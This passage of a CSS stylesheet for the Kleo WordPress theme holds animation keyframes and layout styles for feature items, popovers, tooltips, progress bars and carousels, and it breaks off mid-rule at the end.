.one-by-one-animated .el-appear, .kleo-transform .kleo-thumbs-animated.th-appear img, .kleo-transform .el-appear { opacity: 0.1; -moz-transform:scale(0.5); -webkit-transform:scale(0.5); -o-transform:scale(0.5); transform:scale(0.5); } .kleo-transform .multi-columns-row .el-appear { opacity:1; -moz-transform:scale(1); -webkit-transform:scale(1); -o-transform:scale(1); transform:scale(1); } .kleo-transform .one-by-one-animated .start-animation .el-appear, .kleo-transform .kleo-thumbs-animated.th-appear img.start-animation, .kleo-transform .start-animation.el-appear { -webkit-animation: kleo_appear 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Safari 4+ */ -moz-animation: kleo_appear 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Fx 5+ */ -o-animation: kleo_appear 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Opera 12+ */ animation: kleo_appear 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* IE 10+ */ opacity: 1; -moz-transform:scale(1); -webkit-transform:scale(1); -o-transform:scale(1); transform:scale(1); } /* Define Keyframes */ @-webkit-keyframes kleo_appear { 0% { -webkit-transform:scale(0.5); opacity: 0.1; } 100% { -webkit-transform:scale(1); opacity: 1; } } @-moz-keyframes kleo_appear { 0% { -moz-transform:scale(0.5); opacity: 0.1; } 100% { -moz-transform:scale(1);opacity: 1; } } @-o-keyframes kleo_appear { 0% { -o-transform:scale(0.5); opacity: 0.1; } 100% { -o-transform:scale(1); opacity: 1; } } @keyframes kleo_appear { 0% { transform:scale(0.5); opacity: 0.1; } 100% { transform:scale(1); opacity: 1; } } /* -------------------------------------------------- One by one & Individual Element Animations - Fade ----------------------------------------------------- */ .kleo-transform .one-by-one-animated .el-fade, .kleo-transform .kleo-thumbs-animated.th-fade img, .kleo-transform .el-fade { opacity: 0.1; } .kleo-transform .one-by-one-animated .start-animation .el-fade, .kleo-transform .kleo-thumbs-animated.th-fade img.start-animation, .kleo-transform .start-animation.el-fade { -webkit-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Safari 4+ */ -moz-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Fx 5+ */ -o-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Opera 12+ */ animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* IE 10+ */ opacity: 1; } .kleo-transform .el-zero-fade { opacity: 0; } .kleo-transform .start-animation.el-zero-fade { -webkit-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Safari 4+ */ -moz-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Fx 5+ */ -o-animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Opera 12+ */ animation: kleo_fade 2s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* IE 10+ */ opacity: 1; } /* Define Keyframes */ @-webkit-keyframes kleo_fade { 0% {opacity: 0.1;} 100% {opacity: 1;} } @-moz-keyframes kleo_fade { 0% {opacity: 0.1;} 100% {opacity: 1;} } @-o-keyframes kleo_fade { 0% {opacity: 0.1;} 100% {opacity: 1;} } @keyframes kleo_fade { 0% {opacity: 0.1;} 100% {opacity: 1;} } /* -------------------------------------------------- Individual Element Animations - Pulsate ----------------------------------------------------- */ .kleo-transform .pulsate { -webkit-animation: pulsate 1s ease-out; -webkit-animation-iteration-count: infinite; -moz-animation: pulsate 1s ease-out; -moz-animation-iteration-count: infinite; -ms-animation: pulsate 1s ease-out; -ms-animation-iteration-count: infinite; } @-webkit-keyframes pulsate { 0% { -webkit-transform: scale(.65,.65); opacity: 0.0; } 50% { opacity: 1.0; } 100% { -webkit-transform: scale(1.7, 1.7); opacity: 0.0; } } @-moz-keyframes pulsate { 0% { -moz-transform: scale(.65,.65); opacity: 0.0; } 50% { opacity: 1.0; } 100% { -moz-transform: scale(1.7, 1.7); opacity: 0.0; } } @-ms-keyframes pulsate { 0% { -ms-transform: scale(.5,.5); opacity: 0.0; } 50% { opacity: 1.0; } 100% { -ms-transform: scale(2, 2); opacity: 0.0; } } /* -------------------------------------------------- Individual Element Animations - Progress Bar ----------------------------------------------------- */ .kleo-transform .custom-progress-bar div.progress.start-animation .bar-outer { -webkit-animation: kleo_expand 1.5s cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Safari 4+ */ -moz-animation: kleo_expand 1.5s cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Fx 5+ */ -o-animation: kleo_expand 1.5s cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Opera 12+ */ animation: kleo_expand 1.5s cubic-bezier(0.165, 0.840, 0.440, 1.000); /* IE 10+ */ width:100%; } @-webkit-keyframes kleo_expand { 0% { width:0%; } 100% { width:100%; } } @-moz-keyframes kleo_expand { 0% { width:0%; } 100% { width:100%; } } @-o-keyframes kleo_expand { 0% { width:0%; } 100% { width:100%; } } @keyframes kleo_expand { 0% { width:0%; } 100% { width:100%; } } /*pop up animation*/ /*slide down (height increase) animation*/ .kleo-slide-down { -webkit-animation: kleo_slide_down 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -moz-animation: kleo_slide_down 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -o-animation: kleo_slide_down 1s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); animation: kleo_slide_down 1s 1 cubic-bezier(0.175,0.885,0.320,1.275); height:100%; } @-webkit-keyframes kleo_slide_down { 0% { height:0%; } 100% { height:100%; } } @-moz-keyframes kleo_slide_down { 0% { height:0%; } 100% { height:100%; } } @-o-keyframes kleo_slide_down { 0% { height:0%; } 100% { height:100%; } } @keyframes kleo_slide_down { 0% { height:0%; } 100% { height:100%; } } /* Fontello Spin Animation */ .animate-spin { -moz-animation: spin 2s infinite linear; -o-animation: spin 2s infinite linear; -webkit-animation: spin 2s infinite linear; animation: spin 2s infinite linear; display: inline-block; } @-moz-keyframes spin { 0% { -moz-transform: rotate(0deg); -o-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); -o-transform: rotate(359deg); -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @-webkit-keyframes spin { 0% { -moz-transform: rotate(0deg); -o-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); -o-transform: rotate(359deg); -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @-o-keyframes spin { 0% { -moz-transform: rotate(0deg); -o-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); -o-transform: rotate(359deg); -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @-ms-keyframes spin { 0% { -moz-transform: rotate(0deg); -o-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); -o-transform: rotate(359deg); -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @keyframes spin { 0% { -moz-transform: rotate(0deg); -o-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); -o-transform: rotate(359deg); -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @-webkit-keyframes fadeInDown { 0% { opacity: 0; -webkit-transform: translateY(-20px); } 100% { opacity: 1; -webkit-transform: translateY(0); } } @-moz-keyframes fadeInDown { 0% { opacity: 0; -moz-transform: translateY(-20px); } 100% { opacity: 1; -moz-transform: translateY(0); } } @-o-keyframes fadeInDown { 0% { opacity: 0; -o-transform: translateY(-20px); } 100% { opacity: 1; -o-transform: translateY(0); } } @keyframes fadeInDown { 0% { opacity: 0; transform: translateY(-20px); } 100% { opacity: 1; transform: translateY(0); } } .animated.fadeInDown { -webkit-animation-name: fadeInDown; -moz-animation-name: fadeInDown; -o-animation-name: fadeInDown; animation-name: fadeInDown; } /* -------------------------------------------------- SHORTCODES ----------------------------------------------------- */ /* Theme Name: Kleo Template Description: A multipurpose Wordpress template Author: SeventhQueen Author URI: http://themeforest.net/user/SeventhQueen/portfolio?ref=SeventhQueen Version: 1.0 Tags: clean, responsive, creative, minimal, modern, landing page, bootstrap 3 01. Feature Items 02. Poi and Pins 03. Popover 04. Tooltip 05. Dividers & Gaps 06. Progress Bar 07. Carousels 08. Single image 09. Pie chart 10. Media Queries 11. Progress bar */ /* ----------------------------------------- 01. Feature Items ----------------------------------------- */ .feature-item { margin-bottom: 30px; text-align: left; } .feature-item:hover .feature-icon, .colored-icons .feature-item:hover .feature-icon { } .feature-item.default-icons-size .feature-icon, .feature-item.big-icons-size .feature-icon { display: inline-block; float: left; top: 0; text-align: center; -moz-border-radius:50px; -webkit-border-radius:50px; border-radius:50px; transition: all 0.3s ease-in-out 0s; } .feature-item.default-icons-size .feature-icon { font-size: 37px; margin: 1px 16px 0 0; width: 67px; height: 67px; line-height: 65px; border: 1px solid transparent; } .bordered-icons .feature-item.default-icons-size .feature-icon { width: 67px; height: 67px; line-height: 65px; } .feature-item.big-icons-size .feature-icon { font-size: 57px; width: 87px; height: 87px; line-height: 80px; border: 1px solid transparent; } .bordered-icons .feature-item.big-icons-size .feature-icon { width: 87px; height: 87px; line-height: 80px; } .feature-item.default-icons-size .feature-title { margin: 0 12px 10px 83px; font-size: 28px !important; } .feature-item.big-icons-size .feature-title { margin: 0 12px 10px 94px; font-size: 28px !important; } .feature-item.big-icons-size { display: inline-block; } .feature-item.big-icons-size.center-icons { display: block; } .feature-item.default-icons-size .feature-text { margin: 0 0 20px 83px; } .bordered-icons .feature-item.default-icons-size .feature-text { margin: 0 0 20px 83px; } .feature-item.big-icons-size .feature-text { margin: 0 0 20px 94px; } .feature-item.default-icons-size.center-icons .feature-icon { margin: 1px 0 20px -36px; } .feature-item.big-icons-size.center-icons .feature-icon {} .feature-item.default-icons-size.center-icons .feature-icon, .feature-item.big-icons-size.center-icons .feature-icon { float: none; text-align: center; left: 50%; position: relative; } .bordered-icons .feature-item.default-icons-size.center-icons .feature-text { margin: 0 0 20px 0; } .feature-item.default-icons-size.center-icons .feature-icon { margin-bottom: 20px; } .feature-item.big-icons-size.center-icons .feature-icon { margin: 1px 0 20px -46px; } .feature-item.center-icons .feature-title { margin-left: 0; margin-bottom: 20px; text-align: center; } .feature-item.center-icons .feature-text { margin-left: 0; text-align: center; } .box-style { overflow: hidden; } .box-style .feature-item { text-align: center; padding: 20px; margin-bottom: -99999px; padding-bottom: 99999px; vertical-align: middle; } .box-style .feature-item.default-icons-size .feature-icon, .box-style .feature-item.big-icons-size .feature-icon { left: 0; margin-left: 0; } .box-style .feature-item h3 { margin: 0; font-size: 18px; line-height: 24px; } .box-style .feature-item h5 { margin-top: 10px; } .box-style p:empty { display: none; height: 0; margin: 0; } .box-style strong {} .box-style p { margin-top: 0; } /*.box-style h3 + p { margin-top: 1em; }*/ @media (min-width: 320px) and (max-width: 400px) { .feature-item.default-icons-size, .feature-item.big-icons-size { text-align: center; margin-bottom: 30px; padding-bottom: 10px; } .feature-item.default-icons-size .feature-icon { float: none; margin: 0 auto 10px; } .feature-item.big-icons-size .feature-icon { float: none; margin: 0 auto 30px; } .feature-item.default-icons-size .feature-text, .feature-item.default-icons-size .feature-title, .feature-item.big-icons-size .feature-title, .feature-item.big-icons-size .feature-text { margin: 0; } .bordered-icons .feature-item.default-icons-size .feature-text { margin: 0 0 20px 0; } .feature-item.big-icons-size.center-icons .feature-icon { left: auto; margin: 0 auto 30px; } } /* clear first in row in ie 8 or lower */ .multi-columns-row .first-in-row { clear: left; } /* clear the first in row for any block that has the class "multi-columns-row" */ .multi-columns-row .col-xs-6:nth-child(2n + 3) { clear: left; } .multi-columns-row .col-xs-4:nth-child(3n + 4) { clear: left; } .multi-columns-row .col-xs-3:nth-child(4n + 5) { clear: left; } .multi-columns-row .col-xs-2:nth-child(6n + 7) { clear: left; } .multi-columns-row .col-xs-1:nth-child(12n + 13) { clear: left; } @media (min-width: 768px) { /* reset previous grid */ .multi-columns-row .col-xs-6:nth-child(2n + 3) { clear: none; } .multi-columns-row .col-xs-4:nth-child(3n + 4) { clear: none; } .multi-columns-row .col-xs-3:nth-child(4n + 5) { clear: none; } .multi-columns-row .col-xs-2:nth-child(6n + 7) { clear: none; } .multi-columns-row .col-xs-1:nth-child(12n + 13) { clear: none; } /* clear first in row for small columns */ .multi-columns-row .col-sm-6:nth-child(2n + 3) { clear: left; } .multi-columns-row .col-sm-4:nth-child(3n + 4) { clear: left; } .multi-columns-row .col-sm-3:nth-child(4n + 5) { clear: left; } .multi-columns-row .col-sm-2:nth-child(6n + 7) { clear: left; } .multi-columns-row .col-sm-1:nth-child(12n + 13) { clear: left; } } @media (min-width: 992px) { /* reset previous grid */ .multi-columns-row .col-sm-6:nth-child(2n + 3) { clear: none; } .multi-columns-row .col-sm-4:nth-child(3n + 4) { clear: none; } .multi-columns-row .col-sm-3:nth-child(4n + 5) { clear: none; } .multi-columns-row .col-sm-2:nth-child(6n + 7) { clear: none; } .multi-columns-row .col-sm-1:nth-child(12n + 13) { clear: none; } /* clear first in row for medium columns */ .multi-columns-row .col-md-6:nth-child(2n + 3) { clear: left; } .multi-columns-row .col-md-4:nth-child(3n + 4) { clear: left; } .multi-columns-row .col-md-3:nth-child(4n + 5) { clear: left; } .multi-columns-row .col-md-2:nth-child(6n + 7) { clear: left; } .multi-columns-row .col-md-1:nth-child(12n + 13) { clear: left; } } @media (min-width: 1200px) { /* reset previous grid */ .multi-columns-row .col-md-6:nth-child(2n + 3) { clear: left; } .multi-columns-row .col-md-4:nth-child(3n + 4) { clear: left; } .multi-columns-row .col-md-3:nth-child(4n + 5) { clear: left; } .multi-columns-row .col-md-2:nth-child(6n + 7) { clear: none; } .multi-columns-row .col-md-1:nth-child(12n + 13) { clear: none; } /* clear first in row for large columns */ .multi-columns-row .col-lg-6:nth-child(2n + 3) { clear: left; } .multi-columns-row .col-lg-4:nth-child(3n + 4) { clear: left; } .multi-columns-row .col-lg-3:nth-child(4n + 5) { clear: left; } .multi-columns-row .col-lg-2:nth-child(6n + 7) { clear: left; } .multi-columns-row .col-lg-1:nth-child(12n + 13) { clear: left; } } /* ----------------------------------------- 02. Poi and Pins ----------------------------------------- */ .pin-attached { position: relative; } .kleo-pin-circle { position: absolute; width: 23px; height: 23px; background: rgba(0,0,0,0.1); border-radius: 50%; -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; z-index: 9999; } .kleo-pin-circle span { display: block; top: 0; left: 0; width: 23px; height: 23px; border: 0; outline: 0; overflow: hidden; text-indent: -5555px; cursor: default; border-radius: 50%; -webkit-transform: scale(0.415); -moz-transform: scale(0.415); -ms-transform: scale(0.415); -o-transform: scale(0.415); transform: scale(0.415); -webkit-transition: all 0.2s ease; -moz-transition: all 0.2s ease; -o-transition: all 0.2s ease; transition: all 0.2s ease; } .kleo-pin-circle:hover span { -webkit-transform: scale(1); -moz-transform: scale(1); -ms-transform: scale(1); -o-transform: scale(0.3); transform: scale(1); } .kleo-pin-circle span:hover { cursor: pointer; } .kleo-pin-poi { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); border-style: solid; border-width: 6px; border-radius: 14px 14px 14px 0; box-shadow: -1px 1px 2px rgba(0, 0, 0, 0.2); display: inline-block; width: 8px; height: 8px; padding: 5px; margin-top: 40px; transform: rotate(-45deg); position: absolute; z-index: 9999; } .kleo-pin-icon { position: absolute; width: 23px; height: 23px; line-height: 23px; background: rgba(0,0,0,0.1); border-radius: 50%; -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; z-index: 9999; } .kleo-pin-icon span { display: block; top: 0; left: 0; width: 23px; height: 23px; line-height: 23px; border: 0; outline: 0; overflow: hidden; text-align: center; cursor: default; border-radius: 50%; -webkit-transform: scale(0.815); -moz-transform: scale(0.815); -ms-transform: scale(0.815); -o-transform: scale(0.815); transform: scale(0.815); -webkit-transition: all 0.2s ease; -moz-transition: all 0.2s ease; -o-transition: all 0.2s ease; transition: all 0.2s ease; } .kleo-pin-icon:hover span { -webkit-transform: scale(1); -moz-transform: scale(1); -ms-transform: scale(1); -o-transform: scale(1); transform: scale(1); } .kleo-pin-icon span:hover { cursor: pointer; } .kleo-pin-icon span i { /*color: #fff !important;*/ } /* ----------------------------------------- 03. Popover ----------------------------------------- */ .popover { position: absolute; top: 0; left: 0; z-index: 1010; display: none; max-width: 276px !important; padding: 0; text-align: left; white-space: normal; border: none; border-radius: 6px; background: #fff; box-shadow: 0px 3px 18px 0px rgba(0, 0, 0, 0.1); background-clip: padding-box; -webkit-bg-clip: padding-box; -moz-bg-clip: padding; } .tp-caption .popover { /* Fix when used width in RevSlider */ min-width: 180px; } .popover.top { margin-top: -30px; } .popover.right { margin-left: 40px; } .popover.bottom { margin-top: 90px; } .popover.left { margin-left: -40px; } .popover-title { padding: 10px 14px; margin: 0; font-size: 21px; /*font-family: 'Roboto Condensed', sans-serif;*/ font-weight: 300; line-height: 30px; border: none; border-radius: 5px 5px 0 0; } .popover-content { padding: 9px 14px; font-size: 13px; line-height: 20px; } .popover.top .arrow { border-top-color: #fff; } .popover.top .arrow:after { border-top-color: #fff; } .popover.right .arrow { border-right-color: #fff; } .popover.right .arrow:after { border-right-color: #fff; } .popover.bottom .arrow { border-top-color: transparent !important; border-left-color: transparent !important; border-right-color: transparent !important; } .popover.bottom .arrow:after { border-top-color: transparent !important; border-left-color: transparent !important; border-right-color: transparent !important; } .popover.left .arrow { border-left-color: #fff; } .popover.left .arrow:after { border-left-color: #fff; } /* ----------------------------------------- 04. Tooltip ----------------------------------------- */ .tooltip { /*font-family: 'Open Sans', sans-serif;*/ font-weight: normal; } .tooltip.in { opacity: 1; filter: alpha(opacity=100); } .tooltip.top { margin-top: -10px; } .tooltip.right { margin-left: 26px; } .tooltip.bottom { margin-top: 36px; } .tooltip.left { margin-left: -26px; } .tooltip-inner { max-width: 200px; padding: 8px; color: #777; text-align: center; text-decoration: none; background-color: #fff; border-color: #e5e5e5; border-radius: 4px; border-style: solid; border-width: 1px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } /* ----------------------------------------- .05 Dividers & Gaps ----------------------------------------- */ .gap-10, .gap-20, .gap-30, .gap-40, .gap-60, .gap-100, .kleo-gap{ clear: both; } .gap-10 { height: 10px; line-height: 10px; } .gap-20 { height: 20px; line-height: 20px; } .gap-30 { height: 30px; line-height: 30px; } .gap-40 { height: 40px; line-height: 40px; } .gap-60 { height: 60px; line-height: 60px; } .gap-100 { height: 100px; line-height: 100px; } .hr-title { border-top-style: solid; border-top-width: 1px; /*color: #bbb;*/ font-size: 11px; text-align: center; height: 10px; line-height: 20px; margin: 10px auto -10px; height: auto; } .hr-title abbr { /*padding: 0 10px;*/ padding: 2px 10px; border-radius: 2px; position: relative; top: -10px; letter-spacing: 0.2em; text-transform: uppercase; } .hr-title i { position: relative; top: -2px; font-size: 8px; } .hr-title.hr-full { width: 100%; } .hr-title.hr-long { width: 50%; } .hr-title.hr-short { width: 25%; } .hr-title.hr-left { text-align: left; } .hr-title.hr-right { text-align: right; } .hr-title.hr-left abbr { padding-left: 0; } .hr-title.hr-right abbr { padding-right: 0; } .hr-title.hr-left.hr-long { margin-left: 0; } .hr-title.hr-right.hr-long { margin-right: 0; } .hr-title.hr-double { border-top: 4px double #ebebeb; } .hr-title.hr-double abbr { top: -12px; } /* ----------------------------------------- 06. Progress Bar ----------------------------------------- */ .progress-bar-container { } .custom-progress-bar { position: relative; } .progressbar-icon { position: absolute; left: 0; top: -15px; width: 50px; text-align: center; font-weight: 100; font-size: 50px; color: #e5e5e5; } .progressbar-title { position: absolute; z-index: 2; bottom: 0; left: 70px; padding:0 10px; border-radius: 3px; height:30px; line-height: 30px; } .custom-progress-bar .progress { height: 30px; line-height: 30px; position: relative; margin-left: 70px; background: #f7f7f7; box-shadow: none; } .custom-progress-bar .bar { background: #e5e5e5; } .custom-progress-bar div.progress .bar-outer, .custom-progress-bar div.progress .bar { height: 100%; position: absolute; top: 0; left: 0; width: 100%; background-size: 32px 32px; border-radius: 3px; } .custom-progress-bar div.progress .bar strong { display: block; height: 30px; position: absolute; top: 0; right: 0px; padding: 0 7px; background-color: #e5e5e5; line-height: 30px; font-size: 10px; border-radius: 0 2px 2px 0; -moz-border-radius: 2px 2px 2px 2px; -webkit-border-radius: 2px 2px 2px 2px; -o-border-radius: 2px 2px 2px 2px; opacity: 0; } .custom-progress-bar div.progress { clear: both; } .kleo-transform div.progress .bar-outer{ width:0; } .custom-progress-bar.thin-progress .progressbar-title { position: absolute; z-index: 2; bottom: 0; left: 0; padding: 0; border-radius: 3px; height:30px; line-height: 30px; } .custom-progress-bar.thin-progress .progress { height: 5px; line-height: 5px; position: relative; margin-left: 0; background: #f7f7f7; box-shadow: none; overflow: visible; } .custom-progress-bar.thin-progress div.progress .bar-outer, .custom-progress-bar.thin-progress div.progress .bar { height: 100%; position: absolute; top: 0; left: 0; width: 100%; background-size: 32px 32px; border-radius: 3px; } .custom-progress-bar.thin-progress div.progress .bar strong { display: block; height: 18px; position: absolute; top: -20px; right: 0px; padding: 0 7px; line-height: 18px; font-size: 10px; border-radius: 2px; -moz-border-radius: 2px; -webkit-border-radius: 2px; -o-border-radius: 2px; opacity: 0; } .chart { position: relative; display: inline-block; width: 110px; height: 110px; margin-top: 50px; margin-bottom: 50px; text-align: center; } .chart canvas { position: absolute; top: 0; left: 0; } .percentage { display: inline-block; line-height: 110px; z-index: 2; } .percentage:after { content: '%'; margin-left: 0.1em; font-size: .8em; } .angular { margin-top: 100px; } .angular .chart { margin-top: 0; } /* ----------------------------------------- 07. Carousels ----------------------------------------- */ /* Carrousel Defaults */ .kleo-carousel-items { position: relative; } .kleo-carousel-container { position: relative; overflow: hidden; } .kleo-carousel-container.dot-carousel { overflow: visible; } .kleo-carousel-container.dot-carousel ul.kleo-carousel { padding-left: 0px; } .caroufredsel_wrapper {} .kleo-carousel-items { text-align: center; margin: 0 auto; } .kleo-carousel-items ul { margin-left: 0; padding-left:0; } .kleo-carousel li { display: block; float: left; list-style: none; } .loop-image img { width: 100%; height: auto; } .kleo-carousel li article article { padding-right: 0; } .loop-image { position: relative; overflow: hidden; } .loop-image a, .gallery-container { position: relative; } .loop-image a { display: block;} .carousel-arrow .carousel-prev, .carousel-arrow .carousel-next { position: absolute; width: 35px; height: 75px; background: rgba(0, 0, 0, 0); color: #fff; text-align: center; font-size : 18px; -ms-transition: all 0.3s ease-out; -moz-transition: all 0.3s ease-out; -webkit-transition: all 0.3s ease-out; -o-transition: all 0.3s ease-out; transition: all 0.3s ease-out; } .carousel-arrow .carousel-prev i, .carousel-arrow .carousel-next i { line-height: 75px; } .carousel-arrow .carousel-prev { left: -35px; top: 44%; margin-top: -33px; border-radius: 3px; } .carousel-arrow .carousel-next { right: -35px; top: 44%; margin-top: -33px; border-radius: 3px; } .dot-carousel .carousel-arrow .carousel-prev { margin-left: -5px; } .dot-carousel .carousel-arrow .carousel-next { margin-right: -5px; } .kleo-carousel-container:hover .carousel-arrow .carousel-prev { left : 20px; color: #fff; background: rgba(0,0,0,0.1); } .kleo-carousel-container:hover .carousel-arrow .carousel-next { right : 20px; color: #fff; background: rgba(0,0,0,0.1); } .gallery-container:hover .gal-carrow .carousel-prev { top : 78%; background: rgba(0,0,0,0.2); } .gallery-container:hover .gal-carrow .carousel-next { top : 78%; background: rgba(0,0,0,0.2); } .kleo-carousel-container .carousel-arrow .carousel-prev:hover, .kleo-carousel-container .carousel-arrow .carousel-next:hover, .kleo-carousel-container .gal-carrow .carousel-prev:hover, .kleo-carousel-container .gal-carrow .carousel-next:hover { background: rgba(0,0,0,0.3); } .kleo-carousel-features { text-align: center; margin: 0 auto; } .kleo-carousel-features .caroufredsel_wrapper { margin-bottom: 0 !important; } .kleo-carousel-features img { /*width: 100%;*/ height: auto; } .kleo-carousel-features .kleo-carousel li figure { text-align: center; } .kleo-carousel-features-pager { padding: 20px 0; } /* Carrousel Banner Items */ .kleo-banner-slider { position: relative; overflow: hidden; opacity: 0; } .kleo-banner-items { float: left; height: 0; } .kleo-banner-items:first-child {} .kleo-banner-items article { position: relative; float: left; } .kleo-banner-items img { width: 100%; height: auto; } .kleo-banner-slider .carousel-pager { position: absolute; bottom: 20px; text-align: center; width: 100%; } .kleo-banner-slider .carousel-pager a { background: rgba(255,255,255, 0.3); } .kleo-banner-slider .carousel-pager a.selected { background: rgba(255,255,255, 1); } .kleo-banner-prev, .kleo-banner-next { position: absolute; width: 35px; height: 46px; background: rgba(0, 0, 0, 0); color: #fff; text-align: center; font-size: 18px; -ms-transition: all 0.3s ease-out; -moz-transition: all 0.3s ease-out; -webkit-transition: all 0.3s ease-out; -o-transition: all 0.3s ease-out; transition: all 0.3s ease-out; } .kleo-banner-prev { left: -35px; top: 50%; margin-top: -23px; border-radius: 0 3px 3px 0; } .kleo-banner-next { right: -35px; top: 50%; margin-top: -23px; border-radius: 3px 0 0 3px; } .kleo-banner-slider:hover .kleo-banner-prev { left: 0; color: #fff; } .kleo-banner-slider:hover .kleo-banner-next { right: 0; color: #fff; } .kleo-banner-slider .kleo-banner-prev:hover, .kleo-banner-slider .kleo-banner-next:hover { } .kleo-banner-prev i, .kleo-banner-next i { line-height: 46px; -ms-transition: all 0.3s ease-out; -moz-transition: all 0.3s ease-out; -webkit-transition: all 0.3s ease-out; -o-transition: all 0.3s ease-out; transition: all 0.3s ease-out; } .kleo-banner-prev:hover i, .kleo-banner-next:hover i { font-size: 26px; } .kleo-banner-arrow {} .kleo-banner-arrow .kleo-banner-prev, .kleo-banner-arrow .kleo-banner-next { position: absolute; width: 30px; height: 30px; color: #fff; text-align: center; font-size : 14px; z-index: 9999; -ms-transition: all 0.3s ease-out; -moz-transition: all 0.3s ease-out; -webkit-transition: all 0.3s ease-out; -o-transition: all 0.3s ease-out; transition: all 0.3s ease-out; border-radius: 2px; } .kleo-banner-arrow .kleo-banner-prev i, .kleo-banner-arrow .kleo-banner-next i { line-height: 30px; } .kleo-banner-arrow .kleo-banner-prev { left: auto; right: 45px; top: 93%; margin-top: -25px; } .kleo-banner-arrow .kleo-banner-next { right: 10px; top: 93%; margin-top: -25px; } .kleo-banner-slider:hover .kleo-banner-arrow .kleo-banner-prev { left: inherit; } .kleo-banner-slider:hover .kleo-banner-arrow .kleo-banner-next { right: 10px; } .kleo-carousel .kleo-banner-items:first-child { height: 0; } /* Carousel Feature Items */ .features-carousel li { display: block; float: left; list-style: none; text-align: center; } .features-carousel img { height: auto; } .features-carousel {} .features-carousel ul { margin: 0; padding: 0; list-style: none; } .features-carousel li {} /* Carousel Testimonial Items */ .kleo-carousel-testimonials {} .kleo-carousel-testimonials li { text-align: center; padding: 10px 15px; } .kleo-carousel-testimonials .testimonial-image { width: 60px; height: 60px; line-height: 60px; margin: 0 auto; position: relative; color: #c8c8c8; text-align: center; } .kleo-carousel-testimonials .testimonial-image:before { font: 28px 'fontello'; content: "\e854"; position: absolute; top: 25px; left: 44px; margin-left: -24px; } .kleo-carousel-testimonials .testimonial-image img { width: 60px; height: 60px; border-radius: 100%; /*border-width: 5px; border-style: solid; border-color: #fff;*/ position: relative; } .kleo-carousel-testimonials .testimonial-content { font-style: italic; padding: 10px 10px 0; text-align: center; font-size: 14px; } .kleo-carousel-testimonials .testimonial-meta { font-size: 12px; text-align: center; } .kleo-carousel-testimonials .testimonial-name {} .kleo-carousel-testimonials .testimonial-subtitle {} /* Carousel pager */ .carousel-pager { text-align: center; margin: 0 auto; } .carousel-pager a { text-decoration: none; text-indent: -999px; display: inline-block; overflow: hidden; width: 6px; height: 6px; margin: 0 5px 0 0; -moz-border-radius: 50%; -webkit-border-radius: 50%; border-radius: 50%; } .carousel-pager a.selected { text-decoration: underline; } /* Carousel Gallery With Thumbs */ .kleo-gallery-image { position: relative; overflow: hidden; } .kleo-gallery-image > div { opacity: 0; } .kleo-gallery-image > div:first-child { opacity: 1; } .kleo-gallery { position: relative; overflow: hidden; } .kleo-gallery .kleo-carousel a { float: left; text-align: center; position: relative; margin: 1px; } .kleo-gallery .kleo-carousel a img { min-width: 100%; } .kleo-gallery-image div, .kleo-gallery-image img, .kleo-thumbs-animated, .kleo-thumbs-images .kleo-thumbs-animated img, .kleo-thumbs-images img { display: block; width: 100%; } .kleo-thumbs-animated.rounded img, .kleo-thumbs-images.rounded img { border-radius: 100%; } .kleo-gallery-image span {} .kleo-thumbs-animated a, .kleo-thumbs-images a { display: inline-block; float: left; position: relative; /*padding: 5px;*/ margin: 1px; } .kleo-gallery .kleo-thumbs-images a { margin: 0;} .kleo-single-image .kleo-thumbs-animated img { display: inline-block; } .kleo-single-image .caroufredsel_wrapper .kleo-carousel { text-align: center !important; } .kleo-single-image .kleo-carousel { text-align: center; /*width: 100% !important;*/ } .kleo-single-image .kleo-carousel img { width: auto !important; } .one-thumb a, .one-thumbs a { /* If not set this will be default thumb width */ width: 100%; } .two-thumbs a { width: 49.9%; } .three-thumbs a { width: 33.3%; } .four-thumbs a { width: 25%; } .five-thumbs a { width: 20%; } .six-thumbs a { width: 16.66%; } .seven-thumbs a { width: 14.2857%; } .eight-thumbs a { width: 12.5%; } .nine-thumbs a { width: 11.1111%; } .ten-thumbs a { width: 10%; } .eleven-thumbs a { width: 9.0909%; } .twelve-thumbs a { width: 8.3333%; } .kleo-thumbs-prev, .kleo-thumbs-next { position: absolute; width: 35px; height: 75px; background: rgba(0, 0, 0, 0); color: #fff; text-align: center; font-size: 18px; -ms-transition: all 0.3s ease-out; -moz-transition: all 0.3s ease-out; -webkit-transition: all 